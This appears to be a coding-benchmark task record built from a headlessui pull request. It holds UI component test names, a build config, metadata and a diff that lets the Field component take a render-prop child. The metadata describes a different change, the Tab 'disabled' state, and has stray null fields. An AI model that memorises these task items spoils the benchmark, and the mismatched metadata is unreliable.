/> without a parent <Dialog 
/>", "should error when we are using a <DialogPanel /> without a parent <Dialog />", "should be possible to render a Dialog without crashing", "should be possible to access the ref on the DialogBackdrop", "should be possible to access the ref on the DialogPanel", "should complain when an `open` prop is missing", "should be able to explicitly choose role=dialog", "should be able to explicitly choose role=alertdialog", "should fall back to role=dialog for an invalid role", "should complain when an `open` prop is not a boolean", "should be possible to render a Dialog using a render prop", "should be possible to pass props to the Dialog itself", "should be possible to always render the Dialog if we provide it a `static` prop (and enable focus trapping based on `open`)", "should be possible to always render the Dialog if we provide it a `static` prop (and disable focus trapping based on `open`)", "should be possible to use a different render strategy for the Dialog", "should add a scroll lock to the html tag", "should wait to add a scroll lock to the html tag when unmount is false in a Transition", "scroll locking should work when transitioning between dialogs", "should remove the scroll lock when the open closed state is `Closing`", "should not have a scroll lock when the transition marked as not shown", "should be possible to render DialogOverlay using a render prop", "should throw an error if a DialogBackdrop is used without a DialogPanel", "should not throw an error if a DialogBackdrop is used with a DialogPanel", "should portal the DialogBackdrop", "should be possible to render DialogTitle using a render prop", "should be possible to render DialogDescription using a render prop", "should be possible to open a dialog from inside a Popover (and then close it)", "should be possible to open the Dialog via a Transition component", "should be possible to close the Dialog via a Transition component", "should be possible to close the dialog with Escape", "should be 
possible to close the dialog with Escape, when a field is focused", "should not be possible to close the dialog with Escape, when a field is focused but cancels the event", "should be possible to tab around when using the initialFocus ref", "should be possible to tab around when using the initialFocus ref on a component", "should not escape the FocusTrap when there is only 1 focusable element (going forwards)", "should not escape the FocusTrap when there is only 1 focusable element (going backwards)", "should be possible to close a Dialog using a click on the DialogOverlay", "should not close the Dialog when clicking on contents of the Dialog.Overlay", "should be possible to close the dialog, and re-focus the button when we click outside on the body element", "should be possible to close the dialog, and keep focus on the focusable element", "should stop propagating click events when clicking on the Dialog.Overlay", "should be possible to submit a form inside a Dialog", "should stop propagating click events when clicking on an element inside the Dialog", "should should be possible to click on removed elements without closing the Dialog", "should be possible to click on elements created by third party libraries", "should be possible to focus elements created by third party libraries", "should be possible to click elements inside the dialog when they reside inside a shadow boundary", "should close the Dialog if we click outside the DialogPanel", "should not close the Dialog if we click inside the DialogPanel", "should not close the dialog if opened during mouse up", "should not close the dialog if click starts inside the dialog but ends outside", "should be possible to open nested Dialog components and close them with `Escape`", "should be possible to open nested Dialog components and close them with `Outside Click`", "should be possible to open nested Dialog components and close them with `Click on Dialog.Overlay`", "should error when we are using a <Menu.Button /> 
without a parent <Menu />", "should error when we are using a <Menu.Items /> without a parent <Menu />", "should error when we are using a <Menu.Item /> without a parent <Menu />", "should be possible to render a Menu using a render prop", "should be possible to render a Menu.Button using a render prop", "should be possible to render a Menu.Button using a render prop and an `as` prop", "should be possible to render Menu.Items using a render prop", "should be possible to always render the Menu.Items if we provide it a `static` prop", "should be possible to use a different render strategy for the Menu.Items", "should be possible to render a Menu.Item using a render prop", "should be possible to conditionally render classNames (aka className can be a function?!)", "should be possible to wrap the Menu.Items with a Transition component", "should be possible to wrap the Menu.Items with a Transition.Child component", "should close when we use Tab", "should focus trap when we use Shift+Tab", "should not be possible to open the menu with ArrowUp and the last item should be active when the button is disabled", "should be possible to click outside of the menu, on an element which is within a focusable element, which closes the menu", "should error when we are using a <Popover.Button /> without a parent <Popover />", "should error when we are using a <Popover.Panel /> without a parent <Popover />", "should error when we are using a <Popover.Overlay /> without a parent <Popover />", "should be possible to render a Popover.Group with multiple Popover components", "should expose a close function that closes the popover and takes an event", "should be possible to get a ref to the Popover", "should be possible to use a Fragment with an optional ref", "should be possible to render a Popover.Button using a fragment", "should be possible to render a Popover.Button using a render prop", "should be possible to render a Popover.Button using a render prop and an `as` prop", "should be 
possible to render Popover.Panel using a render prop", "should be possible to always render the Popover.Panel if we provide it a `static` prop", "should be possible to use a different render strategy for the Popover.Panel", "should close the Popover, when Popover.Panel has the focus prop and you focus the open button", "should warn when you are using multiple `Popover.Button` components", "should warn when you are using multiple `Popover.Button` components (wrapped in a Transition)", "should not warn when you are using multiple `Popover.Button` components inside the `Popover.Panel`", "should not warn when you are using multiple `Popover.Button` components inside the `Popover.Panel` (wrapped in a Transition)", "should warn when you are using multiple `Popover.Button` components in a nested `Popover`", "should not warn when you are using multiple `Popover.Button` components in a nested `Popover.Panel`", "should be possible to wrap the Popover.Panel with a Transition component", "should close the Popover by pressing `Enter` on a Popover.Button inside a Popover.Panel", "should close the Popover menu, when pressing escape on the Popover.Button", "should close the Popover menu, when pressing escape on the Popover.Panel", "should be possible to close a sibling Popover when pressing escape on a sibling Popover.Button", "should be possible to Tab through the panel contents onto the next Popover.Button", "should be possible to place a focusable item in the Popover.Group, and keep the Popover open when we focus the focusable element", "should close the Popover menu once we Tab out of the Popover.Group", "should close the Popover when the Popover.Panel has a focus prop", "should close the Popover when the Popover.Panel has a focus prop (Popover.Panel uses a Portal)", "should close the Popover when the Popover.Panel has a focus prop (Popover.Panel uses a Portal), and focus the next focusable item in line", "should focus the previous Popover.Button when Shift+Tab on the second 
Popover.Button", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel (inside a Portal)", "should be possible to focus the last item in the Popover.Panel when pressing Shift+Tab on the next Popover.Button", "should be possible to focus the last item in the Popover.Panel when pressing Shift+Tab on the next Popover.Button (using Portal's)", "should close the Popover by pressing `Space` on a Popover.Button inside a Popover.Panel", "should close the Popover by pressing `Enter` on a Popover.Button and go to the href of the `a` inside a Popover.Panel", "should be possible to close a Popover using a click on the Popover.Overlay", "should be possible to close the Popover by clicking on a Popover.Button inside a Popover.Panel", "should not close the Popover when clicking on a focusable element inside a static Popover.Panel", "should not close the Popover when clicking on a non-focusable element inside a static Popover.Panel", "should close the Popover when clicking outside of a static Popover.Panel", "should error when we are using a <ListboxButton /> without a parent <Listbox />", "should error when we are using a <ListboxLabel /> without a parent <Listbox />", "should error when we are using a <ListboxOptions /> without a parent <Listbox />", "should error when we are using a <ListboxOption /> without a parent <Listbox />", "should be possible to render a Listbox without crashing", "should be possible to render a Listbox using a render prop", "should be possible to disable a Listbox", "should not crash in multiple mode", "null should be a valid value for the Listbox", "should be possible to use the by prop (as a string) with a null initial value", "should be possible to use the by prop (as a string) with a null listbox option", "should be possible to use completely new objects while rendering (single mode)", "should be possible to 
use completely new objects while rendering (multiple mode)", "should be possible to render a ListboxLabel using a render prop", "should be possible to render a ListboxLabel using a render prop and an `as` prop", "should be possible to render a ListboxButton using a render prop", "should be possible to render a ListboxButton using a render prop and an `as` prop", "should be possible to render a ListboxButton and a ListboxLabel and see them linked together", "should be possible to render ListboxOptions using a render prop", "should be possible to always render the ListboxOptions if we provide it a `static` prop", "should be possible to use a different render strategy for the ListboxOptions", "should be possible to render a ListboxOption using a render prop", "should expose the value via the render prop", "should be possible to reset to the default value in multiple mode", "should be possible to swap the Listbox option with a button for example", "should always open the ListboxOptions because of a wrapping OpenClosed component", "should always close the ListboxOptions because of a wrapping OpenClosed component", "should be possible to open the listbox with Enter", "should not be possible to open the listbox with Enter when the button is disabled", "should be possible to open the listbox with Enter, and focus the selected option", "should be possible to open the listbox with Enter, and focus the selected option (when using the `hidden` render strategy)", "should be possible to open the listbox with Enter, and focus the selected option (with a list of objects)", "should have no active listbox option when there are no listbox options at all", "should focus the first non disabled listbox option when opening with Enter", "should focus the first non disabled listbox option when opening with Enter (jump over multiple disabled ones)", "should have no active listbox option upon Enter key press, when there are no non-disabled listbox options", "should be possible to close the 
listbox with Enter when there is no active listboxoption", "should be possible to close the listbox with Enter and choose the active listbox option", "should be possible to open the listbox with Space", "should not be possible to open the listbox with Space when the button is disabled", "should be possible to open the listbox with Space, and focus the selected option", "should focus the first non disabled listbox option when opening with Space", "should focus the first non disabled listbox option when opening with Space (jump over multiple disabled ones)", "should have no active listbox option upon Space key press, when there are no non-disabled listbox options", "should be possible to close the listbox with Space and choose the active listbox option", "should be possible to close an open listbox with Escape", "should focus trap when we use Tab", "should be possible to open the listbox with ArrowDown", "should not be possible to open the listbox with ArrowDown when the button is disabled", "should be possible to open the listbox with ArrowDown, and focus the selected option", "should be possible to use ArrowDown to navigate the listbox options", "should be possible to use ArrowDown to navigate the listbox options and skip the first disabled one", "should be possible to use ArrowDown to navigate the listbox options and jump to the first non-disabled one", "should be possible to use ArrowRight to navigate the listbox options", "should be possible to open the listbox with ArrowUp and the last option should be active", "should not be possible to open the listbox with ArrowUp and the last option should be active when the button is disabled", "should be possible to open the listbox with ArrowUp, and focus the selected option", "should be possible to use ArrowUp to navigate the listbox options and jump to the first non-disabled one", "should not be possible to navigate up or down if there is only a single non-disabled option", "should be possible to use ArrowUp to 
navigate the listbox options", "should be possible to use ArrowLeft to navigate the listbox options", "should be possible to use the End key to go to the last listbox option", "should be possible to use the End key to go to the last non disabled listbox option", "should be possible to use the End key to go to the first listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon End key press, when there are no non-disabled listbox options", "should be possible to use the PageDown key to go to the last listbox option", "should be possible to use the PageDown key to go to the last non disabled listbox option", "should be possible to use the PageDown key to go to the first listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon PageDown key press, when there are no non-disabled listbox options", "should be possible to use the Home key to go to the first listbox option", "should be possible to use the Home key to go to the first non disabled listbox option", "should be possible to use the Home key to go to the last listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon Home key press, when there are no non-disabled listbox options", "should be possible to use the PageUp key to go to the first listbox option", "should be possible to use the PageUp key to go to the first non disabled listbox option", "should be possible to use the PageUp key to go to the last listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon PageUp key press, when there are no non-disabled listbox options", "should not be possible to search for a disabled option", "should focus the ListboxButton when we click the ListboxLabel", "should not focus the ListboxButton when we right click the ListboxLabel", "should be possible to open the listbox on click", "should not be possible to open the listbox on 
right click", "should not be possible to open the listbox on click when the button is disabled", "should be possible to open the listbox on click, and focus the selected option", "should be possible to close a listbox on click", "should be a no-op when we click outside of a closed listbox", "should be possible to click outside of the listbox which should close the listbox", "should be possible to click outside of the listbox on another listbox button which should close the current listbox and open the new listbox", "should be possible to click outside of the listbox which should close the listbox (even if we press the listbox button)", "should be possible to hover an option and make it active", "should make a listbox option active when you move the mouse over it", "should be a no-op when we move the mouse and the listbox option is already active", "should be a no-op when we move the mouse and the listbox option is disabled", "should not be possible to hover an option that is disabled", "should be possible to mouse leave an option and make it inactive", "should be possible to mouse leave a disabled option and be a no-op", "should be possible to click a listbox option, which closes the listbox", "should be possible to click a disabled listbox option, which is a no-op", "should be possible focus a listbox option, so that it becomes active", "should not be possible to focus a listbox option which is disabled", "should be possible to pass multiple values to the Listbox component", "should make the first selected option the active item", "should keep the listbox open when selecting an item via the keyboard", "should toggle the selected state of an option when clicking on it", "should toggle the selected state of an option when clicking on it (using objects instead of primitives)", "should error when we are using a <Dialog.Overlay /> without a parent <Dialog />", "should error when we are using a <Dialog.Title /> without a parent <Dialog />", "should error when we are 
using a <Dialog.Backdrop /> without a parent <Dialog />", "should error when we are using a <Dialog.Panel /> without a parent <Dialog />", "should complain when the `open` and `onClose` prop are missing", "should complain when an `open` prop is provided without an `onClose` prop", "should complain when an `onClose` prop is provided without an `open` prop", "should complain when an `onClose` prop is not a function", "should be possible to render Dialog.Overlay using a render prop", "should throw an error if a Dialog.Backdrop is used without a Dialog.Panel", "should not throw an error if a Dialog.Backdrop is used with a Dialog.Panel", "should portal the Dialog.Backdrop", "should be possible to render Dialog.Title using a render prop", "should be possible to render Dialog.Description using a render prop", "should be possible to close a Dialog using a click on the Dialog.Overlay", "should not close the Dialog if it starts open and we click inside the Dialog when it has only a panel", "should close the Dialog if we click outside the Dialog.Panel", "should not close the Dialog if we click inside the Dialog.Panel", "should be possible to open nested Dialog components (visible when mounted) and close them with `Escape`", "should be possible to open nested Dialog components (visible when mounted) and close them with `Outside Click`", "should be possible to open nested Dialog components (visible when mounted) and close them with `Click on Dialog.Overlay`", "should be possible to open nested Dialog components (visible when always) and close them with `Escape`", "should be possible to open nested Dialog components (visible when always) and close them with `Outside Click`", "should trigger the `change` when the tab changes", "should error when we are using a <TabList /> without a parent <TabGroup /> component", "should error when we are using a <Tab /> without a parent <TabGroup /> component", "should error when we are using a <TabPanels /> without a parent <TabGroup /> 
component", "should error when we are using a <TabPanel /> without a parent <TabGroup /> component", "should be possible to render TabGroup without crashing", "should be possible to render the TabPanels first, then the TabList", "should guarantee the order when injecting new tabs dynamically", "should guarantee the order of DOM nodes when reversing the tabs and panels themselves, then performing actions (controlled component)", "should guarantee the order of DOM nodes when reversing the tabs and panels themselves, then performing actions (uncontrolled component)", "should expose the `selectedIndex` on the `Tabs` component", "should expose the `selectedIndex` on the `TabList` component", "should expose the `selectedIndex` on the `TabPanels` component", "should expose the `selected` state on the `TabPanel` components", "should jump to the nearest tab when the defaultIndex is out of bounds (-2)", "should jump to the nearest tab when the defaultIndex is out of bounds (+5)", "should jump to the next available tab when the defaultIndex is a disabled tab", "should jump to the next available tab when the defaultIndex is a disabled tab and wrap around", "should not change the Tab if the defaultIndex changes", "should select first tab if no tabs were provided originally", "should select first tab if no tabs were provided originally (with a defaultIndex of 1)", "should not change the tab in a controlled component if you do not respond to the @change", "should be possible to change active tab controlled and uncontrolled", "should jump to the nearest tab when the selectedIndex is out of bounds (-2)", "should jump to the nearest tab when the selectedIndex is out of bounds (+5)", "should jump to the next available tab when the selectedIndex is a disabled tab", "should jump to the next available tab when the selectedIndex is a disabled tab and wrap around", "should prefer selectedIndex over defaultIndex", "should wrap around when overflowing the index when using a controlled 
component", "should wrap around when underflowing the index when using a controlled component", "should be possible to tab to the default initial first tab", "should be possible to tab to the default index tab", "should be possible to go to the next item (activation = `auto`)", "should be possible to go to the next item (activation = `manual`)", "should wrap around at the end (activation = `auto`)", "should wrap around at the end (activation = `manual`)", "should not be possible to go right when in vertical mode (activation = `auto`)", "should not be possible to go right when in vertical mode (activation = `manual`)", "should be possible to go to the previous item (activation = `auto`)", "should be possible to go to the previous item (activation = `manual`)", "should wrap around at the beginning (activation = `auto`)", "should wrap around at the beginning (activation = `manual`)", "should not be possible to go left when in vertical mode (activation = `auto`)", "should not be possible to go left when in vertical mode (activation = `manual`)", "should not be possible to go down when in horizontal mode (activation = `auto`)", "should not be possible to go down when in horizontal mode (activation = `manual`)", "should be possible to go to the first focusable item (activation = `auto`)", "should be possible to go to the first focusable item (activation = `manual`)", "should be possible to activate the focused tab", "should be possible to click on a tab to focus it", "should be a no-op when clicking on a disabled tab", "should be possible to go to the next item containing a Dialog component", "should trigger the `onChange` when the tab changes", "should error when we are using a <Tab.List /> without a parent <Tab.Group /> component", "should error when we are using a <Tab /> without a parent <Tab.Group /> component", "should error when we are using a <Tab.Panels /> without a parent <Tab.Group /> component", "should error when we are using a <Tab.Panel /> without a parent 
<Tab.Group /> component", "should be possible to render Tab.Group without crashing", "should be possible to render the Tab.Panels first, then the Tab.List", "should be possible to render using as={Fragment}", "should be possible to render using multiple as={Fragment}", "should expose the `selectedIndex` on the `Tab.Group` component", "should expose the `selectedIndex` on the `Tab.List` component", "should expose the `selectedIndex` on the `Tab.Panels` component", "should expose the `selected` state on the `Tab.Panel` components", "should not change the tab in a controlled component if you do not respond to the onChange", "should not steal the ref from the child", "should render without crashing", "should be possible to render a Transition without children", "should yell at us when we forget the required show prop", "should render a div and its children by default", "should passthrough all the props (that we do not use internally)", "should render another component if the `as` prop is used and its children by default", "should passthrough all the props (that we do not use internally) even when using an `as` prop", "should render nothing when the show prop is false", "should be possible to change the underlying DOM tag", "should be possible to use a render prop", "should yell at us when we forget to forward the ref when using a render prop", "should yell at us when we forget to wrap the `<Transition.Child />` in a parent <Transition /> component", "should be possible to render a Transition.Child without children", "should be possible to use a Transition.Root and a Transition.Child", "should be possible to nest transition components", "should be possible to change the underlying DOM tag of the Transition.Child components", "should be possible to change the underlying DOM tag of the Transition component and Transition.Child components", "should be possible to use render props on the Transition.Child components", "should be possible to use render props on the Transition 
and Transition.Child components", "should yell at us when we forgot to forward the ref on one of the Transition.Child components", "should yell at us when we forgot to forward a ref on the Transition component", "should support new lines in class lists", "should be possible to passthrough the transition classes", "should be possible to passthrough the transition classes and immediately apply the enter transitions when appear is set to true", "should fire events in the correct order", "should fire only one event for a given component change", "should error when we are using a <Listbox.Button /> without a parent <Listbox />", "should error when we are using a <Listbox.Label /> without a parent <Listbox />", "should error when we are using a <Listbox.Options /> without a parent <Listbox />", "should error when we are using a <Listbox.Option /> without a parent <Listbox />", "should be possible to render a Listbox.Label using a render prop", "should be possible to render a Listbox.Label using a render prop and an `as` prop", "should be possible to render a Listbox.Button using a render prop", "should be possible to render a Listbox.Button using a render prop and an `as` prop", "should be possible to render a Listbox.Button and a Listbox.Label and see them linked together", "should be possible to render Listbox.Options using a render prop", "should be possible to always render the Listbox.Options if we provide it a `static` prop", "should be possible to use a different render strategy for the Listbox.Options", "should be possible to render a Listbox.Option using a render prop", "should be possible to wrap the Listbox.Options with a Transition component", "should focus the Listbox.Button when we click the Listbox.Label", "should not focus the Listbox.Button when we right click the Listbox.Label", "should be possible to click outside of the listbox, on an element which is within a focusable element, which closes the listbox", "should yell at us when we forget to wrap the 
`<TransitionChild />` in a parent <Transition /> component", "should be possible to render a TransitionChild without children", "should be possible to change the underlying DOM tag of the TransitionChild components", "should be possible to change the underlying DOM tag of the Transition component and TransitionChild components", "should be possible to use render props on the TransitionChild components", "should be possible to use render props on the Transition and TransitionChild components", "should yell at us when we forgot to forward the ref on one of the TransitionChild components", "should transition in completely (duration defined in seconds)", "should transition in completely (duration defined in seconds) in (render strategy = hidden)", "should transition in completely", "should transition out completely", "should transition out completely (render strategy = hidden)", "should transition in and out completely", "should transition in and out completely (render strategy = hidden)", "should not unmount the whole tree when some children are still transitioning", "should error when we are using a <ComboboxButton /> without a parent <Combobox />", "should error when we are using a <ComboboxLabel /> without a parent <Combobox />", "should error when we are using a <ComboboxOptions /> without a parent <Combobox />", "should error when we are using a <ComboboxOption /> without a parent <Combobox />", "should be possible to render a Combobox without crashing", "should guarantee the order of options based on `order` when performing actions", "should be possible to render a Combobox using a render prop", "should be possible to disable a Combobox", "should not crash when a defaultValue is not given", "should close the Combobox when the input is blurred", "selecting an option puts the value into Combobox.Input when displayValue is not provided", "selecting an option puts the display value into Combobox.Input when displayValue is provided", "selecting an option puts the 
display value into Combobox.Input when displayValue is provided (when v-model is undefined)", "conditionally rendering the input should allow changing the display value", "should be possible to override the `type` on the input", "should move the caret to the end of the input when syncing the value", "should be possible to render a ComboboxLabel using a render prop", "should be possible to link Input/Button and Label if Label is rendered last", "should be possible to render a ComboboxLabel using a render prop and an `as` prop", "should be possible to render a ComboboxButton using a render prop", "should be possible to render a ComboboxButton using a render prop and an `as` prop", "should be possible to render a ComboboxButton and a ComboboxLabel and see them linked together", "should be possible to render ComboboxOptions using a render prop", "should be possible to always render the ComboboxOptions if we provide it a `static` prop", "should be possible to use a different render strategy for the ComboboxOptions", "should be possible to render a ComboboxOption using a render prop", "should be possible to swap the Combobox option with a button for example", "should mark all the elements between Combobox.Options and Combobox.Option with role none", "should always open the ComboboxOptions because of a wrapping OpenClosed component", "should always close the ComboboxOptions because of a wrapping OpenClosed component", "should sync the active index properly", "should be possible to open the Combobox with Enter", "should not be possible to open the combobox with Enter when the button is disabled", "should be possible to open the combobox with Enter, and focus the selected option", "should be possible to open the combobox with Enter, and focus the selected option (when using the `hidden` render strategy)", "should be possible to open the combobox with Enter, and focus the selected option (with a list of objects)", "should have no active combobox option when there are no 
combobox options at all", "should be possible to open the combobox with Space", "should not be possible to open the combobox with Space when the button is disabled", "should be possible to open the combobox with Space, and focus the selected option", "should have no active combobox option upon Space key press, when there are no non-disabled combobox options", "should be possible to close an open combobox with Escape", "should not propagate the Escape event when the combobox is open", "should propagate the Escape event when the combobox is closed", "should be possible to open the combobox with ArrowDown", "should not be possible to open the combobox with ArrowDown when the button is disabled", "should be possible to open the combobox with ArrowDown, and focus the selected option", "should be possible to open the combobox with ArrowUp and the last option should be active", "should not be possible to open the combobox with ArrowUp and the last option should be active when the button is disabled", "should be possible to open the combobox with ArrowUp, and focus the selected option", "should be possible to use ArrowUp to navigate the combobox options and jump to the first non-disabled one", "should be possible to close the combobox with Enter and choose the active combobox option", "pressing Tab should select the active item and move to the next DOM node", "pressing Shift+Tab should select the active item and move to the previous DOM node", "should bubble escape when using `static` on Combobox.Options", "should bubble escape when not using Combobox.Options at all", "should sync the input field correctly and reset it when pressing Escape", "should be possible to use ArrowDown to navigate the combobox options", "should be possible to use ArrowDown to navigate the combobox options and skip the first disabled one", "should be possible to use ArrowDown to navigate the combobox options and jump to the first non-disabled one", "should be possible to go to the next item if no 
value is set", "should be possible to use ArrowUp to navigate the combobox options", "should be possible to use the End key to go to the last combobox option", "should be possible to use the End key to go to the last non disabled combobox option", "should be possible to use the End key to go to the first combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon End key press, when there are no non-disabled combobox options", "should be possible to use the PageDown key to go to the last combobox option", "should be possible to use the PageDown key to go to the last non disabled Combobox option", "should be possible to use the PageDown key to go to the first combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon PageDown key press, when there are no non-disabled combobox options", "should be possible to use the Home key to go to the first combobox option", "should be possible to use the Home key to go to the first non disabled combobox option", "should be possible to use the Home key to go to the last combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon Home key press, when there are no non-disabled combobox options", "should be possible to use the PageUp key to go to the first combobox option", "should be possible to use the PageUp key to go to the first non disabled combobox option", "should be possible to use the PageUp key to go to the last combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon PageUp key press, when there are no non-disabled combobox options", "should reset the value when the last character is removed, when in `nullable` mode", "should not be possible to search and activate a disabled option", "should maintain activeIndex and activeOption when filtering", "should focus the ComboboxButton when we click the ComboboxLabel", 
"should not focus the ComboboxInput when we right click the ComboboxLabel", "should be possible to open the combobox by focusing the input with immediate mode enabled", "should not be possible to open the combobox by focusing the input with immediate mode disabled", "should not be possible to open the combobox by focusing the input with immediate mode enabled when button is disabled", "should be possible to close a combobox on click with immediate mode enabled", "should be possible to close a focused combobox on click with immediate mode enabled", "should be possible to open the combobox on click", "should not be possible to open the combobox on right click", "should not be possible to open the combobox on click when the button is disabled", "should be possible to open the combobox on click, and focus the selected option", "should be possible to close a combobox on click", "should be a no-op when we click outside of a closed combobox", "should be possible to click outside of the combobox on another combobox button which should close the current combobox and open the new combobox", "should be possible to click outside of the combobox which should close the combobox (even if we press the combobox button)", "should be possible to click outside of the combobox, on an element which is within a focusable element, which closes the combobox", "should be possible to hover an option and make it active when using `static`", "should make a combobox option active when you move the mouse over it", "should be a no-op when we move the mouse and the combobox option is already active", "should be a no-op when we move the mouse and the combobox option is disabled", "should be possible to click a combobox option, which closes the combobox", "should be possible to click a combobox option, which closes the combobox with immediate mode enabled", "should be possible to click a disabled combobox option, which is a no-op", "should be possible focus a combobox option, so that it becomes 
active", "should not be possible to focus a combobox option which is disabled", "should be possible to hold the last active option", "should sync the input field correctly and reset it when resetting the value from outside (to null)", "should sync the input field correctly and reset it when resetting the value from outside (to undefined)", "should sync the input field correctly and reset it when resetting the value from outside (when using displayValue)", "should be possible to pass multiple values to the Combobox component", "should keep the combobox open when selecting an item via the keyboard", "should reset the active option, if the active option gets unmounted", "should error when we are using a <Combobox.Button /> without a parent <Combobox />", "should error when we are using a <Combobox.Label /> without a parent <Combobox />", "should error when we are using a <Combobox.Options /> without a parent <Combobox />", "should error when we are using a <Combobox.Option /> without a parent <Combobox />", "selecting an option puts the display value into Combobox.Input when displayValue is provided (when value is undefined)", "should be possible to render a Combobox.Label using a render prop", "should be possible to render a Combobox.Label using a render prop and an `as` prop", "should be possible to render a Combobox.Button using a render prop", "should be possible to render a Combobox.Button using a render prop and an `as` prop", "should be possible to render a Combobox.Button and a Combobox.Label and see them linked together", "should be possible to render Combobox.Options using a render prop", "should be possible to always render the Combobox.Options if we provide it a `static` prop", "should be possible to use a different render strategy for the Combobox.Options", "should be possible to render a Combobox.Option using a render prop", "should be possible to wrap the Combobox.Options with a Transition component", "should be possible to open the combobox with 
Enter", "should be possible to use the PageDown key to go to the last non disabled combobox option", "should focus the Combobox.Input when we click the Combobox.Label", "should not focus the Combobox.Input when we right click the Combobox.Label", "should warn when changing the combobox from uncontrolled to controlled", "should warn when changing the combobox from controlled to uncontrolled" ]
Method: Tab (React) render prop argument <TabRenderPropArg> Location: packages/@headlessui-react/src/components/tabs/tabs.tsx → type TabRenderPropArg Inputs: - selected: boolean – whether the tab is currently selected. - active: boolean – whether the tab is the active (focused) element. - focus: boolean – whether the tab has keyboard focus. - autofocus: boolean – whether the tab should automatically receive focus on mount. - disabled: boolean – whether the tab is disabled (exposed via `props.disabled ?? false`; defaults to false). Outputs: The object is supplied to the child‑render‑function of `<Tab />`. Tests assert that `disabled` is present and equal to `false` when the component is rendered without the prop. Function: Tab slot payload (Vue) <TabSlotProps> Location: packages/@headlessui-vue/src/components/tabs/tabs.ts → slot object returned in render function Inputs: - selected: boolean – whether the tab is currently selected. - disabled: boolean – whether the tab is disabled (exposed via `props.disabled ?? false`; defaults to false). Outputs: The slot object is made available to the default slot of `<Tab />`. Tests verify that the JSON string rendered from the slot includes `"disabled": false`.
MIT
{ "base_image_name": "node_20", "install": [ "npm ci --prefer-offline --no-audit --progress=false" ], "log_parser": "parse_log_js_4", "test_cmd": "npm test -- --verbose --no-colors" }
{ "num_modified_files": 4, "num_modified_lines": 11, "pr_author": "RobinMalfait", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.94, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue asks to expose a `disabled` state on the <Tab/> component so that it appears in the render-prop arguments and can be used with utility classes. The supplied test patch adds expectations for a `disabled` flag (default false) in the render output, which directly matches the requested behavior. No external dependencies, naming constraints, or ambiguous specifications are present, and the tests align with the stated requirement, so the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, 
"test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
f2bc6fdd4021969fb0ddeada980d5996fc106790
2024-01-23 12:58:01
tailwindlabs__headlessui-2941
diff --git a/packages/@headlessui-react/CHANGELOG.md b/packages/@headlessui-react/CHANGELOG.md index f98abbf..52d371a 100644 --- a/packages/@headlessui-react/CHANGELOG.md +++ b/packages/@headlessui-react/CHANGELOG.md @@ -12,6 +12,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 - Expose `disabled` state on `<Tab />` component ([#2918](https://github.com/tailwindlabs/headlessui/pull/2918)) - Prevent default behaviour when clicking outside of a `Dialog.Panel` ([#2919](https://github.com/tailwindlabs/headlessui/pull/2919)) - Use `isFocused` instead of `isFocusVisible` for `Input` and `Textarea` components ([#2940](https://github.com/tailwindlabs/headlessui/pull/2940)) +- Ensure `children` prop of `Field` component can be a render prop ([#2941](https://github.com/tailwindlabs/headlessui/pull/2941)) ## [2.0.0-alpha.4] - 2024-01-03 diff --git a/packages/@headlessui-react/src/components/field/field.tsx b/packages/@headlessui-react/src/components/field/field.tsx index 0a22218..d770c16 100644 --- a/packages/@headlessui-react/src/components/field/field.tsx +++ b/packages/@headlessui-react/src/components/field/field.tsx @@ -53,7 +53,13 @@ function FieldFn<TTag extends ElementType = typeof DEFAULT_FIELD_TAG>( ourProps, theirProps: { ...theirProps, - children: <FormFieldsProvider>{theirProps.children}</FormFieldsProvider>, + children: ( + <FormFieldsProvider> + {typeof theirProps.children === 'function' + ? theirProps.children(slot) + : theirProps.children} + </FormFieldsProvider> + ), }, slot, defaultTag: DEFAULT_FIELD_TAG,
Ensure `children` prop of `Field` component can be a render prop This PR ensures that the `Field` can be used using a render prop as the children of the `Field` component. This means that we can now do this again: ```tsx <Field> {({ disabled }) => { return <input className={disabled ? "..." : "..."} />; }} </Field> ``` This normally works in every component, but it was missing because we were manually wrapping the children in a component and forgot to handle this case.
**Title** Allow `Field` component to accept a render‑prop as its children **Problem** The `Field` component could only render static JSX children. When a function (render prop) was passed, it was treated as a regular node, preventing access to the field’s internal state (e.g., `disabled`). This broke the common pattern of using `Field` with a render‑prop child. **Root Cause** `Field` unconditionally wrapped its children with a provider component, never invoking the child when it was a function. **Fix / Expected Behavior** - `Field` now detects if its children are a function. - If so, it calls the function with the field’s slot data and renders the result. - Non‑function children continue to be rendered unchanged, still inside the provider context. - The provider remains in place for both cases, preserving context propagation. - Type definitions reflect that `children` may be a render‑prop function. **Risk & Validation** - Verify that existing static children still render correctly and retain context. - Add tests for the render‑prop usage to ensure `slot` values (e.g., `disabled`) are received. - Run the full test suite to confirm no regressions in related components.
2,941
tailwindlabs/headlessui
